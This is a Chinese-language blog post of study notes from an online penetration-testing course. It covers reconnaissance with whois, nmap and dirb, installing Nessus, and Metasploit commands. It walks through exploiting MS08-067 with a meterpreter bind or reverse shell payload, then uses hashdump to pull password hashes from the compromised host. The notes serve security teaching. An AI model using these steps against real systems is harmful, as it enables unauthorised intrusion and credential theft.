渗透测试网课学习笔记

在“知道”上学习南开大学的”攻防基础——漏洞利用及渗透测试“网课，做一些简要的笔记，免得以后忘记。随着我的学习进度以后会逐步完善该篇blog。

0x00信息收集

1.被动信息收集

1.1 搜索引擎搜索

搜索引擎指令大全：指令大全

1.2 IP查询

ping命令 （不加www精度高）

1.3 whois信息收集

• whois命令（whois xxxx.com）
• 查询网站

1.4 DNS信息收集

• host命令（host -t ns xxxx.com）
• 查询网站

1.5 旁站查询

• 查询网站
• bing搜索（IP:%+IP）

2.主动信息收集

2.1 nmap扫描

nmap常见参数：常见参数

2.2 Web指纹探测

• 随意提交一个错误页面
• 使用nmap -sV

2.3 Web敏感目录扫描

通过保存着敏感路径的字典（后台路径，在线编辑路径，上传路径，备份文件等）来对目录进行暴力猜解

• 扫描工具：dirb
  使用方法：dirb www.XXXX.com

平时多收集敏感路径充实字典，如：_system、_sys等

• Web爬虫工具：webscarab
  目录爆破，xss测试等

0x01 漏洞扫描

1.Nessus应用

一个漏洞完备的电脑漏洞扫描工具。

1.1 安装

下载后安装：dpkg -i nessus-9.1.0-XXXX.deb
启动：/etc/init.d/nessusd start
打开浏览器后输入：https://127.0.0.1:8834
配置后开始下载，如果下载出错，关闭进入终端输入/opt/nessus/sbin/nessuscli update --plugins-only
然后重新启动Nessus：/etc/init.d/nessusd restart

1.2 使用

具体使用看这个博客：Nessus使用

0x02 漏洞利用

1.Metasploit渗透测试框架

1.1 命令

• 启动：msfconsole
• 跳出模块：back
• 显示所有可用渗透模块：show exploits
• 查找特定渗透模块（支持正则查询）：search
• 显示辅助模块及其用途：show auxiliary
• 显示模块参数：show options
• 显示攻击载荷：show payloads
• 加载模块或payload：use
• 列出受漏洞影响的目标系统的类型：show targets
• 显示模块详细信息：info
• 检测目标主机是否存在指定漏洞：check
• 攻击：exploit
• 设置/清空设置参数：set/unset

1.2 大致流程

1. 查找该漏洞的渗透攻击模块(如MS08-067)：search ms08_067
2. 使用该模块：use exploit/windows/smb/ms08_067_netapi
3. 查看模块选项：show options
4. 设置参数：set RHOST xxx.xxx.xxx.xxx
5. 查找攻击载荷：show payloads
6. 设置攻击载荷：set payload windows/meterpreter/bind_tcp(reverse_tcp:反向连接shell，需要设置LHOST//bind_tcp:正向连接shell，需要设置RHOST)
7. 查看载荷参数：show options
8. 设置载荷参数：set RHOST xxx.xxx.xxx.xxx
9. 查看支持版本：show targets
10. 设置版本：set target xx
11. 攻击：exploit

具体使用看这个博客：metasploit使用

0x03 后渗透攻击

1.挖掘用户名和密码

windows存储哈希值：LAN Manager（LM）、NT LAN Manager（NTLM）or NT LAN Manager v2（NTLMv2）
使用Meterpreter中hashdump模块提取用户名和密码哈希：hashdump

2.获取目标主机控制权

在meterpreter中利用shell命令获取目标主机的控制台。
终止meterpreter会话：exit
抓取meterpreter桌面的屏幕截图：screenshot
更改meterpreter桌面：set_desktop
其余meterpreter命令见本博客：Meterpreter命令详解
教材：《漏洞利用及渗透测试基础》（清华大学出版社）

0x04 渗透文档编写

ps:网课中没有讲解，等我上网查找到资料后再进行更新。